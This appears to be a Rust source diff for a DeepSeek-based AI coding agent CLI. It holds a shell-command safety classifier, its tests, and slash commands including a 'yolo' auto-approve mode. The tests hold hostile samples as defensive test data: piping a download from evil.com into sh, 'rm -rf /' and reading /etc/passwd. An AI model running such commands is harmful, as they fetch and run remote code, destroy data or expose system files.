#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum CommandCategory {
|
||||
FileSystem,
|
||||
Network,
|
||||
Process,
|
||||
Package,
|
||||
Git,
|
||||
Build,
|
||||
System,
|
||||
Shell,
|
||||
Other,
|
||||
}
|
||||
|
||||
/// Get the category of a command
|
||||
pub fn categorize_command(command: &str) -> CommandCategory {
|
||||
let primary = match extract_primary_command(command) {
|
||||
Some(cmd) => cmd.to_lowercase(),
|
||||
None => return CommandCategory::Other,
|
||||
};
|
||||
|
||||
match primary.as_str() {
|
||||
"ls" | "dir" | "cat" | "head" | "tail" | "less" | "more" | "cp" | "mv" | "rm" | "mkdir"
|
||||
| "rmdir" | "touch" | "chmod" | "chown" | "ln" | "find" | "fd" | "locate" | "stat"
|
||||
| "file" => CommandCategory::FileSystem,
|
||||
|
||||
"curl" | "wget" | "fetch" | "nc" | "netcat" | "ssh" | "scp" | "sftp" | "rsync" | "ftp"
|
||||
| "ping" | "traceroute" | "nslookup" | "dig" | "host" | "nmap" => CommandCategory::Network,
|
||||
|
||||
"ps" | "top" | "htop" | "kill" | "killall" | "pkill" | "pgrep" | "nice" | "renice"
|
||||
| "nohup" | "timeout" => CommandCategory::Process,
|
||||
|
||||
"npm" | "yarn" | "pnpm" | "pip" | "pip3" | "brew" | "apt" | "apt-get" | "yum" | "dnf"
|
||||
| "pacman" => CommandCategory::Package,
|
||||
|
||||
"git" | "gh" | "hub" => CommandCategory::Git,
|
||||
|
||||
"make" | "cmake" | "ninja" | "meson" | "cargo" | "go" | "gcc" | "g++" | "clang"
|
||||
| "rustc" | "javac" | "tsc" => CommandCategory::Build,
|
||||
|
||||
"sudo" | "su" | "systemctl" | "service" | "shutdown" | "reboot" | "mount" | "umount"
|
||||
| "fdisk" | "parted" => CommandCategory::System,
|
||||
|
||||
"bash" | "sh" | "zsh" | "fish" | "csh" | "tcsh" | "dash" | "source" | "." | "exec"
|
||||
| "eval" => CommandCategory::Shell,
|
||||
|
||||
_ => CommandCategory::Other,
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_safe_commands() {
|
||||
assert_eq!(analyze_command("ls -la").level, SafetyLevel::Safe);
|
||||
assert_eq!(analyze_command("cat file.txt").level, SafetyLevel::Safe);
|
||||
assert_eq!(analyze_command("git status").level, SafetyLevel::Safe);
|
||||
assert_eq!(
|
||||
analyze_command("grep pattern file").level,
|
||||
SafetyLevel::Safe
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_workspace_safe_commands() {
|
||||
assert_eq!(
|
||||
analyze_command("mkdir test").level,
|
||||
SafetyLevel::WorkspaceSafe
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("touch file.txt").level,
|
||||
SafetyLevel::WorkspaceSafe
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("npm install").level,
|
||||
SafetyLevel::WorkspaceSafe
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_dangerous_commands() {
|
||||
assert_eq!(analyze_command("rm -rf /").level, SafetyLevel::Dangerous);
|
||||
assert_eq!(analyze_command("rm -rf ~").level, SafetyLevel::Dangerous);
|
||||
assert_eq!(
|
||||
analyze_command("curl http://evil.com | sh").level,
|
||||
SafetyLevel::Dangerous
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_privileged_commands() {
|
||||
assert_eq!(
|
||||
analyze_command("sudo rm file").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("su -c 'command'").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_network_commands() {
|
||||
assert_eq!(
|
||||
analyze_command("curl https://example.com").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("wget file.tar.gz").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("ssh user@host").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_rm_with_flags() {
|
||||
assert_eq!(
|
||||
analyze_command("rm -rf node_modules").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("rm -rf ../outside").level,
|
||||
SafetyLevel::Dangerous
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("rm -rf ~/Downloads").level,
|
||||
SafetyLevel::Dangerous
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_git_push() {
|
||||
assert_eq!(
|
||||
analyze_command("git push origin main").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
assert_eq!(
|
||||
analyze_command("git push --force").level,
|
||||
SafetyLevel::RequiresApproval
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_path_escapes_workspace() {
|
||||
assert!(path_escapes_workspace("/etc/passwd", "/home/user/project"));
|
||||
assert!(path_escapes_workspace("~/secret", "/home/user/project"));
|
||||
assert!(!path_escapes_workspace(
|
||||
"./src/main.rs",
|
||||
"/home/user/project"
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_extract_primary_command() {
|
||||
assert_eq!(extract_primary_command("ls -la"), Some("ls"));
|
||||
assert_eq!(
|
||||
extract_primary_command("env FOO=bar cargo build"),
|
||||
Some("cargo")
|
||||
);
|
||||
assert_eq!(extract_primary_command(" git status "), Some("git"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_categorize_command() {
|
||||
assert_eq!(categorize_command("ls -la"), CommandCategory::FileSystem);
|
||||
assert_eq!(
|
||||
categorize_command("curl https://example.com"),
|
||||
CommandCategory::Network
|
||||
);
|
||||
assert_eq!(categorize_command("git status"), CommandCategory::Git);
|
||||
assert_eq!(categorize_command("npm install"), CommandCategory::Package);
|
||||
assert_eq!(
|
||||
categorize_command("sudo apt update"),
|
||||
CommandCategory::System
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,240 @@
|
||||
//! Config commands: config, set, settings, yolo, trust, logout
|
||||
|
||||
use super::CommandResult;
|
||||
use crate::compaction::CompactionConfig;
|
||||
use crate::config::clear_api_key;
|
||||
use crate::palette;
|
||||
use crate::settings::Settings;
|
||||
use crate::tui::app::{App, AppAction, AppMode, OnboardingState};
|
||||
use crate::tui::approval::ApprovalMode;
|
||||
|
||||
/// Display current configuration
|
||||
pub fn show_config(app: &mut App) -> CommandResult {
|
||||
let has_project_doc = app.project_doc.is_some();
|
||||
let config_info = format!(
|
||||
"Session Configuration:\n\
|
||||
─────────────────────────────\n\
|
||||
Mode: {}\n\
|
||||
Model: {}\n\
|
||||
Workspace: {}\n\
|
||||
Shell enabled: {}\n\
|
||||
Approval mode: {}\n\
|
||||
Max sub-agents: {}\n\
|
||||
Trust mode: {}\n\
|
||||
Auto-compact: {}\n\
|
||||
Total tokens: {}\n\
|
||||
Project doc: {}",
|
||||
app.mode.label(),
|
||||
app.model,
|
||||
app.workspace.display(),
|
||||
if app.allow_shell { "yes" } else { "no" },
|
||||
app.approval_mode.label(),
|
||||
app.max_subagents,
|
||||
if app.trust_mode { "yes" } else { "no" },
|
||||
if app.auto_compact { "yes" } else { "no" },
|
||||
app.total_tokens,
|
||||
if has_project_doc {
|
||||
"loaded"
|
||||
} else {
|
||||
"not found"
|
||||
},
|
||||
);
|
||||
CommandResult::message(config_info)
|
||||
}
|
||||
|
||||
/// Show persistent settings
|
||||
pub fn show_settings(_app: &mut App) -> CommandResult {
|
||||
match Settings::load() {
|
||||
Ok(settings) => CommandResult::message(settings.display()),
|
||||
Err(e) => CommandResult::error(format!("Failed to load settings: {e}")),
|
||||
}
|
||||
}
|
||||
|
||||
/// Modify a setting at runtime
|
||||
pub fn set_config(app: &mut App, args: Option<&str>) -> CommandResult {
|
||||
let Some(args) = args else {
|
||||
let available = Settings::available_settings()
|
||||
.iter()
|
||||
.map(|(k, d)| format!(" {k}: {d}"))
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n");
|
||||
return CommandResult::message(format!(
|
||||
"Usage: /set <key> <value>\n\n\
|
||||
Available settings:\n{available}\n\n\
|
||||
Session-only settings:\n \
|
||||
model: Current model\n \
|
||||
approval_mode: auto | suggest | never\n\n\
|
||||
Add --save to persist to settings file."
|
||||
));
|
||||
};
|
||||
|
||||
let parts: Vec<&str> = args.splitn(2, ' ').collect();
|
||||
if parts.len() < 2 {
|
||||
return CommandResult::error("Usage: /set <key> <value>");
|
||||
}
|
||||
|
||||
let key = parts[0].to_lowercase();
|
||||
let (value, should_save) = if parts[1].ends_with(" --save") {
|
||||
(parts[1].trim_end_matches(" --save").trim(), true)
|
||||
} else {
|
||||
(parts[1].trim(), false)
|
||||
};
|
||||
|
||||
// Handle session-only settings first
|
||||
match key.as_str() {
|
||||
"model" => {
|
||||
app.model = value.to_string();
|
||||
return CommandResult::message(format!("model = {value}"));
|
||||
}
|
||||
"approval_mode" | "approval" => {
|
||||
let mode = match value.to_lowercase().as_str() {
|
||||
"auto" => Some(ApprovalMode::Auto),
|
||||
"suggest" | "suggested" => Some(ApprovalMode::Suggest),
|
||||
"never" => Some(ApprovalMode::Never),
|
||||
_ => None,
|
||||
};
|
||||
return match mode {
|
||||
Some(m) => {
|
||||
app.approval_mode = m;
|
||||
CommandResult::message(format!("approval_mode = {}", m.label()))
|
||||
}
|
||||
None => CommandResult::error("Invalid approval_mode. Use: auto, suggest, never"),
|
||||
};
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Load and update persistent settings
|
||||
let mut settings = match Settings::load() {
|
||||
Ok(s) => s,
|
||||
Err(e) => return CommandResult::error(format!("Failed to load settings: {e}")),
|
||||
};
|
||||
|
||||
if let Err(e) = settings.set(&key, value) {
|
||||
return CommandResult::error(format!("{e}"));
|
||||
}
|
||||
|
||||
// Apply to current session
|
||||
let mut action = None;
|
||||
match key.as_str() {
|
||||
"auto_compact" | "compact" => {
|
||||
app.auto_compact = settings.auto_compact;
|
||||
let mut compaction = CompactionConfig::default();
|
||||
compaction.enabled = app.auto_compact;
|
||||
compaction.token_threshold = app.compact_threshold;
|
||||
compaction.model = app.model.clone();
|
||||
action = Some(AppAction::UpdateCompaction(compaction));
|
||||
}
|
||||
"show_thinking" | "thinking" => {
|
||||
app.show_thinking = settings.show_thinking;
|
||||
app.mark_history_updated();
|
||||
}
|
||||
"show_tool_details" | "tool_details" => {
|
||||
app.show_tool_details = settings.show_tool_details;
|
||||
app.mark_history_updated();
|
||||
}
|
||||
"default_mode" | "mode" => {
|
||||
let mode = match settings.default_mode.as_str() {
|
||||
"agent" | "normal" => AppMode::Agent,
|
||||
"plan" => AppMode::Plan,
|
||||
"yolo" => AppMode::Yolo,
|
||||
"rlm" => AppMode::Rlm,
|
||||
"duo" => AppMode::Duo,
|
||||
_ => AppMode::Agent,
|
||||
};
|
||||
app.set_mode(mode);
|
||||
}
|
||||
"max_history" | "history" => {
|
||||
app.max_input_history = settings.max_input_history;
|
||||
}
|
||||
"default_model" => {
|
||||
if let Some(ref model) = settings.default_model {
|
||||
app.model.clone_from(model);
|
||||
}
|
||||
}
|
||||
"theme" => {
|
||||
app.ui_theme = palette::ui_theme(&settings.theme);
|
||||
app.mark_history_updated();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Save if requested
|
||||
let message = if should_save {
|
||||
if let Err(e) = settings.save() {
|
||||
return CommandResult::error(format!("Failed to save: {e}"));
|
||||
}
|
||||
format!("{key} = {value} (saved)")
|
||||
} else {
|
||||
format!("{key} = {value} (session only, add --save to persist)")
|
||||
};
|
||||
|
||||
CommandResult {
|
||||
message: Some(message),
|
||||
action,
|
||||
}
|
||||
}
|
||||
|
||||
/// Enable YOLO mode (shell + trust + auto-approve)
|
||||
pub fn yolo(app: &mut App) -> CommandResult {
|
||||
app.set_mode(AppMode::Yolo);
|
||||
CommandResult::message("YOLO mode enabled - shell + trust + auto-approve!")
|
||||
}
|
||||
|
||||
/// Enable trust mode (file access outside workspace)
|
||||
pub fn trust(app: &mut App) -> CommandResult {
|
||||
app.trust_mode = true;
|
||||
CommandResult::message("Trust mode enabled - can access files outside workspace")
|
||||
}
|
||||
|
||||
/// Logout - clear API key and return to onboarding
|
||||
pub fn logout(app: &mut App) -> CommandResult {
|
||||
match clear_api_key() {
|
||||
Ok(()) => {
|
||||
app.onboarding = OnboardingState::Welcome;
|
||||
app.api_key_input.clear();
|
||||
app.api_key_cursor = 0;
|
||||
CommandResult::message("Logged out. Enter a new API key to continue.")
|
||||
}
|
||||
Err(e) => CommandResult::error(format!("Failed to clear API key: {e}")),
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::config::Config;
|
||||
use crate::tui::app::{App, TuiOptions};
|
||||
use crate::tui::approval::ApprovalMode;
|
||||
use std::path::PathBuf;
|
||||
|
||||
fn create_test_app() -> App {
|
||||
let options = TuiOptions {
|
||||
model: "test-model".to_string(),
|
||||
workspace: PathBuf::from("."),
|
||||
allow_shell: false,
|
||||
use_alt_screen: true,
|
||||
max_subagents: 1,
|
||||
skills_dir: PathBuf::from("."),
|
||||
memory_path: PathBuf::from("memory.md"),
|
||||
notes_path: PathBuf::from("notes.txt"),
|
||||
mcp_config_path: PathBuf::from("mcp.json"),
|
||||
use_memory: false,
|
||||
start_in_agent_mode: false,
|
||||
yolo: false,
|
||||
resume_session_id: None,
|
||||
};
|
||||
App::new(options, &Config::default())
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yolo_command_sets_all_flags() {
|
||||
let mut app = create_test_app();
|
||||
let _ = yolo(&mut app);
|
||||
assert!(app.allow_shell);
|
||||
assert!(app.trust_mode);
|
||||
assert!(app.yolo);
|
||||
assert_eq!(app.approval_mode, ApprovalMode::Auto);
|
||||
assert_eq!(app.mode, AppMode::Yolo);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,98 @@
|
||||
//! Core commands: help, clear, exit, model
|
||||
|
||||
use std::fmt::Write;
|
||||
|
||||
use crate::tools::plan::PlanState;
|
||||
use crate::tui::app::{App, AppAction};
|
||||
use crate::tui::views::{HelpView, ModalKind, SubAgentsView};
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
/// Show help information
|
||||
pub fn help(app: &mut App, topic: Option<&str>) -> CommandResult {
|
||||
if let Some(topic) = topic {
|
||||
// Show help for specific command
|
||||
if let Some(cmd) = super::get_command_info(topic) {
|
||||
let mut help = format!(
|
||||
"{}\n\n {}\n\n Usage: {}",
|
||||
cmd.name, cmd.description, cmd.usage
|
||||
);
|
||||
if !cmd.aliases.is_empty() {
|
||||
let _ = write!(help, "\n Aliases: {}", cmd.aliases.join(", "));
|
||||
}
|
||||
return CommandResult::message(help);
|
||||
}
|
||||
return CommandResult::error(format!("Unknown command: {topic}"));
|
||||
}
|
||||
|
||||
// Show help overlay
|
||||
if app.view_stack.top_kind() != Some(ModalKind::Help) {
|
||||
app.view_stack.push(HelpView::new());
|
||||
}
|
||||
CommandResult::ok()
|
||||
}
|
||||
|
||||
/// Clear conversation history
|
||||
pub fn clear(app: &mut App) -> CommandResult {
|
||||
app.history.clear();
|
||||
app.mark_history_updated();
|
||||
app.api_messages.clear();
|
||||
app.transcript_selection.clear();
|
||||
app.total_conversation_tokens = 0;
|
||||
app.clear_todos();
|
||||
if let Ok(mut plan) = app.plan_state.lock() {
|
||||
*plan = PlanState::default();
|
||||
}
|
||||
app.tool_log.clear();
|
||||
CommandResult::message("Conversation cleared")
|
||||
}
|
||||
|
||||
/// Exit the application
|
||||
pub fn exit() -> CommandResult {
|
||||
CommandResult::action(AppAction::Quit)
|
||||
}
|
||||
|
||||
/// Available DeepSeek models
|
||||
const AVAILABLE_MODELS: &[&str] = &[
|
||||
"deepseek-reasoner",
|
||||
"deepseek-chat",
|
||||
"deepseek-r1",
|
||||
"deepseek-v3",
|
||||
"deepseek-v3.2",
|
||||
];
|
||||
|
||||
/// Switch or view current model
|
||||
pub fn model(app: &mut App, model_name: Option<&str>) -> CommandResult {
|
||||
if let Some(name) = model_name {
|
||||
let old_model = app.model.clone();
|
||||
app.model = name.to_string();
|
||||
CommandResult::message(format!("Model changed: {old_model} → {name}"))
|
||||
} else {
|
||||
let available = AVAILABLE_MODELS.join(", ");
|
||||
CommandResult::message(format!(
|
||||
"Current model: {}\nAvailable: {}",
|
||||
app.model, available
|
||||
))
|
||||
}
|
||||
}
|
||||
|
||||
/// List sub-agent status from the engine
|
||||
pub fn subagents(app: &mut App) -> CommandResult {
|
||||
if app.view_stack.top_kind() != Some(ModalKind::SubAgents) {
|
||||
app.view_stack
|
||||
.push(SubAgentsView::new(app.subagent_cache.clone()));
|
||||
}
|
||||
app.status_message = Some("Fetching sub-agent status...".to_string());
|
||||
CommandResult::action(AppAction::ListSubAgents)
|
||||
}
|
||||
|
||||
/// Show `DeepSeek` dashboard and docs links
|
||||
pub fn deepseek_links() -> CommandResult {
|
||||
CommandResult::message(
|
||||
"DeepSeek Links:\n\
|
||||
─────────────────────────────\n\
|
||||
Dashboard: https://platform.deepseek.com\n\
|
||||
Docs: https://platform.deepseek.com/docs\n\n\
|
||||
Tip: API keys are available in the dashboard console.",
|
||||
)
|
||||
}
|
||||
@@ -0,0 +1,170 @@
|
||||
//! Debug commands: tokens, cost, system, context, undo, retry
|
||||
|
||||
use super::CommandResult;
|
||||
use crate::models::{SystemPrompt, context_window_for_model};
|
||||
use crate::tui::app::{App, AppAction};
|
||||
use crate::tui::history::HistoryCell;
|
||||
use crate::utils::estimate_message_chars;
|
||||
|
||||
/// Show token usage for session
|
||||
pub fn tokens(app: &mut App) -> CommandResult {
|
||||
let message_count = app.api_messages.len();
|
||||
let chat_count = app.history.len();
|
||||
|
||||
CommandResult::message(format!(
|
||||
"Token Usage:\n\
|
||||
─────────────────────────────\n\
|
||||
Total tokens: {}\n\
|
||||
Session cost: ${:.4}\n\
|
||||
API messages: {}\n\
|
||||
Chat messages: {}\n\
|
||||
Model: {}",
|
||||
app.total_tokens, app.session_cost, message_count, chat_count, app.model,
|
||||
))
|
||||
}
|
||||
|
||||
/// Show session cost breakdown
|
||||
pub fn cost(app: &mut App) -> CommandResult {
|
||||
CommandResult::message(format!(
|
||||
"Session Cost:\n\
|
||||
─────────────────────────────\n\
|
||||
Total spent: ${:.4}\n\n\
|
||||
DeepSeek API Pricing:\n\
|
||||
─────────────────────────────\n\
|
||||
Pricing details are not configured in this CLI.",
|
||||
app.session_cost,
|
||||
))
|
||||
}
|
||||
|
||||
/// Show current system prompt
|
||||
pub fn system_prompt(app: &mut App) -> CommandResult {
|
||||
let prompt_text = match &app.system_prompt {
|
||||
Some(SystemPrompt::Text(text)) => text.clone(),
|
||||
Some(SystemPrompt::Blocks(blocks)) => blocks
|
||||
.iter()
|
||||
.map(|b| b.text.clone())
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n\n---\n\n"),
|
||||
None => "(no system prompt)".to_string(),
|
||||
};
|
||||
|
||||
// Truncate if too long
|
||||
let display = if prompt_text.len() > 500 {
|
||||
// Find a valid UTF-8 char boundary at or before byte 500
|
||||
let truncate_at = prompt_text
|
||||
.char_indices()
|
||||
.take_while(|(i, _)| *i <= 500)
|
||||
.last()
|
||||
.map_or(0, |(i, _)| i);
|
||||
format!(
|
||||
"{}...\n\n(truncated, {} chars total)",
|
||||
&prompt_text[..truncate_at],
|
||||
prompt_text.len()
|
||||
)
|
||||
} else {
|
||||
prompt_text
|
||||
};
|
||||
|
||||
CommandResult::message(format!(
|
||||
"System Prompt ({} mode):\n─────────────────────────────\n{}",
|
||||
app.mode.label(),
|
||||
display
|
||||
))
|
||||
}
|
||||
|
||||
/// Show context window usage
|
||||
pub fn context(app: &mut App) -> CommandResult {
|
||||
let mut total_chars = estimate_message_chars(&app.api_messages);
|
||||
|
||||
// System prompt
|
||||
if let Some(SystemPrompt::Text(text)) = &app.system_prompt {
|
||||
total_chars += text.len();
|
||||
} else if let Some(SystemPrompt::Blocks(blocks)) = &app.system_prompt {
|
||||
for block in blocks {
|
||||
total_chars += block.text.len();
|
||||
}
|
||||
}
|
||||
|
||||
// Rough token estimate (4 chars per token on average)
|
||||
let estimated_tokens = total_chars / 4;
|
||||
|
||||
let context_size = context_window_for_model(&app.model).unwrap_or(128_000);
|
||||
let estimated_tokens_u32 = u32::try_from(estimated_tokens).unwrap_or(u32::MAX);
|
||||
let usage_pct = (f64::from(estimated_tokens_u32) / f64::from(context_size) * 100.0).min(100.0);
|
||||
|
||||
CommandResult::message(format!(
|
||||
"Context Usage:\n\
|
||||
─────────────────────────────\n\
|
||||
Characters: {}\n\
|
||||
Estimated tokens: ~{}\n\
|
||||
Context window: {}\n\
|
||||
Usage: {:.1}%\n\n\
|
||||
Messages: {}\n\
|
||||
API messages: {}",
|
||||
total_chars,
|
||||
estimated_tokens,
|
||||
context_size,
|
||||
usage_pct,
|
||||
app.history.len(),
|
||||
app.api_messages.len(),
|
||||
))
|
||||
}
|
||||
|
||||
/// Remove last message pair (user + assistant)
|
||||
pub fn undo(app: &mut App) -> CommandResult {
|
||||
// Remove from display history (up to the last user message)
|
||||
let mut removed_count = 0;
|
||||
while !app.history.is_empty() {
|
||||
let last_is_user = matches!(app.history.last(), Some(HistoryCell::User { .. }));
|
||||
app.history.pop();
|
||||
removed_count += 1;
|
||||
if last_is_user {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
// Remove from API messages
|
||||
while let Some(last) = app.api_messages.last() {
|
||||
if last.role == "user" {
|
||||
app.api_messages.pop();
|
||||
break;
|
||||
}
|
||||
app.api_messages.pop();
|
||||
}
|
||||
|
||||
if removed_count > 0 {
|
||||
app.mark_history_updated();
|
||||
CommandResult::message(format!("Removed {removed_count} message(s)"))
|
||||
} else {
|
||||
CommandResult::message("Nothing to undo")
|
||||
}
|
||||
}
|
||||
|
||||
/// Retry last request - remove last exchange and re-send the user's message
|
||||
pub fn retry(app: &mut App) -> CommandResult {
|
||||
let last_user_input = app.history.iter().rev().find_map(|cell| match cell {
|
||||
HistoryCell::User { content } => Some(content.clone()),
|
||||
_ => None,
|
||||
});
|
||||
|
||||
match last_user_input {
|
||||
Some(input) => {
|
||||
undo(app);
|
||||
let display_input = if input.len() > 50 {
|
||||
let truncate_at = input
|
||||
.char_indices()
|
||||
.take_while(|(i, _)| *i <= 50)
|
||||
.last()
|
||||
.map_or(0, |(i, _)| i);
|
||||
format!("{}...", &input[..truncate_at])
|
||||
} else {
|
||||
input.clone()
|
||||
};
|
||||
CommandResult::with_message_and_action(
|
||||
format!("Retrying: {display_input}"),
|
||||
AppAction::SendMessage(input),
|
||||
)
|
||||
}
|
||||
None => CommandResult::error("No previous request to retry"),
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,153 @@
|
||||
//! /init command - Generate AGENTS.md for project
|
||||
|
||||
use std::fmt::Write;
|
||||
use std::path::Path;
|
||||
|
||||
use crate::tui::app::App;
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
/// Generate an AGENTS.md file for the current project
|
||||
pub fn init(app: &mut App) -> CommandResult {
|
||||
let workspace = &app.workspace;
|
||||
|
||||
// Check if AGENTS.md already exists
|
||||
let agents_path = workspace.join("AGENTS.md");
|
||||
if agents_path.exists() {
|
||||
return CommandResult::error("AGENTS.md already exists. Delete it first to reinitialize.");
|
||||
}
|
||||
|
||||
// Detect project type and generate appropriate content
|
||||
let content = generate_project_doc(workspace);
|
||||
|
||||
// Write the file
|
||||
match std::fs::write(&agents_path, &content) {
|
||||
Ok(()) => CommandResult::message(format!(
|
||||
"Created AGENTS.md at {}\n\nEdit this file to customize agent behavior for your project.",
|
||||
agents_path.display()
|
||||
)),
|
||||
Err(e) => CommandResult::error(format!("Failed to create AGENTS.md: {e}")),
|
||||
}
|
||||
}
|
||||
|
||||
/// Generate project documentation based on detected project type
|
||||
fn generate_project_doc(workspace: &Path) -> String {
|
||||
let mut doc = String::new();
|
||||
|
||||
// Header
|
||||
doc.push_str("# Project Instructions\n\n");
|
||||
doc.push_str("This file provides context for AI assistants working on this project.\n\n");
|
||||
|
||||
// Detect project type
|
||||
let project_info = detect_project_type(workspace);
|
||||
doc.push_str(&project_info);
|
||||
|
||||
// Add standard sections
|
||||
doc.push_str("\n## Guidelines\n\n");
|
||||
doc.push_str("- Follow existing code style and patterns\n");
|
||||
doc.push_str("- Write tests for new functionality\n");
|
||||
doc.push_str("- Keep changes focused and atomic\n");
|
||||
doc.push_str("- Document public APIs\n");
|
||||
|
||||
doc.push_str("\n## Important Notes\n\n");
|
||||
doc.push_str("<!-- Add project-specific notes here -->\n");
|
||||
|
||||
doc
|
||||
}
|
||||
|
||||
/// Detect project type and return relevant information
|
||||
fn detect_project_type(workspace: &Path) -> String {
|
||||
let mut info = String::new();
|
||||
|
||||
// Check for Rust project
|
||||
if workspace.join("Cargo.toml").exists() {
|
||||
info.push_str("## Project Type: Rust\n\n");
|
||||
info.push_str("### Commands\n");
|
||||
info.push_str("- Build: `cargo build`\n");
|
||||
info.push_str("- Test: `cargo test`\n");
|
||||
info.push_str("- Run: `cargo run`\n");
|
||||
info.push_str("- Check: `cargo check`\n");
|
||||
info.push_str("- Format: `cargo fmt`\n");
|
||||
info.push_str("- Lint: `cargo clippy`\n\n");
|
||||
|
||||
// Try to extract project name from Cargo.toml
|
||||
if let Some(name) = std::fs::read_to_string(workspace.join("Cargo.toml"))
|
||||
.ok()
|
||||
.and_then(|content| extract_cargo_name(&content))
|
||||
{
|
||||
let _ = write!(info, "### Project: {name}\n\n");
|
||||
}
|
||||
}
|
||||
// Check for Node.js project
|
||||
else if workspace.join("package.json").exists() {
|
||||
info.push_str("## Project Type: Node.js\n\n");
|
||||
info.push_str("### Commands\n");
|
||||
info.push_str("- Install: `npm install`\n");
|
||||
info.push_str("- Test: `npm test`\n");
|
||||
info.push_str("- Build: `npm run build`\n");
|
||||
info.push_str("- Start: `npm start`\n\n");
|
||||
|
||||
// Check for common frameworks
|
||||
if workspace.join("next.config.js").exists() || workspace.join("next.config.ts").exists() {
|
||||
info.push_str("### Framework: Next.js\n\n");
|
||||
} else if workspace.join("vite.config.js").exists()
|
||||
|| workspace.join("vite.config.ts").exists()
|
||||
{
|
||||
info.push_str("### Framework: Vite\n\n");
|
||||
}
|
||||
}
|
||||
// Check for Python project
|
||||
else if workspace.join("pyproject.toml").exists() || workspace.join("setup.py").exists() {
|
||||
info.push_str("## Project Type: Python\n\n");
|
||||
info.push_str("### Commands\n");
|
||||
if workspace.join("pyproject.toml").exists() {
|
||||
info.push_str("- Install: `pip install -e .`\n");
|
||||
}
|
||||
info.push_str("- Test: `pytest`\n");
|
||||
info.push_str("- Format: `black .`\n");
|
||||
info.push_str("- Lint: `ruff check .`\n\n");
|
||||
}
|
||||
// Check for Go project
|
||||
else if workspace.join("go.mod").exists() {
|
||||
info.push_str("## Project Type: Go\n\n");
|
||||
info.push_str("### Commands\n");
|
||||
info.push_str("- Build: `go build`\n");
|
||||
info.push_str("- Test: `go test ./...`\n");
|
||||
info.push_str("- Run: `go run .`\n");
|
||||
info.push_str("- Format: `go fmt ./...`\n\n");
|
||||
}
|
||||
// Unknown project type
|
||||
else {
|
||||
info.push_str("## Project Type: Unknown\n\n");
|
||||
info.push_str("<!-- Add build/test commands here -->\n\n");
|
||||
}
|
||||
|
||||
// Check for README
|
||||
if workspace.join("README.md").exists() {
|
||||
info.push_str("### Documentation\n");
|
||||
info.push_str("See README.md for project overview.\n\n");
|
||||
}
|
||||
|
||||
// Check for .gitignore
|
||||
if workspace.join(".gitignore").exists() {
|
||||
info.push_str("### Version Control\n");
|
||||
info.push_str("This project uses Git. See .gitignore for excluded files.\n\n");
|
||||
}
|
||||
|
||||
info
|
||||
}
|
||||
|
||||
/// Extract project name from Cargo.toml
|
||||
fn extract_cargo_name(content: &str) -> Option<String> {
|
||||
for line in content.lines() {
|
||||
let line = line.trim();
|
||||
if line.starts_with("name") && line.contains('=') {
|
||||
let parts: Vec<&str> = line.splitn(2, '=').collect();
|
||||
if parts.len() == 2 {
|
||||
let name = parts[1].trim().trim_matches('"').trim_matches('\'');
|
||||
return Some(name.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
None
|
||||
}
|
||||
@@ -0,0 +1,355 @@
|
||||
//! Slash command registry and dispatch system
|
||||
//!
|
||||
//! This module provides a modular command system inspired by Codex-rs.
|
||||
//! Commands are organized by category and dispatched through a central registry.
|
||||
|
||||
mod config;
|
||||
mod core;
|
||||
mod debug;
|
||||
mod init;
|
||||
mod queue;
|
||||
pub mod rlm;
|
||||
mod session;
|
||||
mod skills;
|
||||
|
||||
use crate::tui::app::{App, AppAction, AppMode};
|
||||
|
||||
/// Result of executing a command
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct CommandResult {
|
||||
/// Optional message to display to the user
|
||||
pub message: Option<String>,
|
||||
/// Optional action for the app to take
|
||||
pub action: Option<AppAction>,
|
||||
}
|
||||
|
||||
impl CommandResult {
|
||||
/// Create an empty result (command succeeded with no output)
|
||||
pub fn ok() -> Self {
|
||||
Self {
|
||||
message: None,
|
||||
action: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a result with just a message
|
||||
pub fn message(msg: impl Into<String>) -> Self {
|
||||
Self {
|
||||
message: Some(msg.into()),
|
||||
action: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a result with an action
|
||||
pub fn action(action: AppAction) -> Self {
|
||||
Self {
|
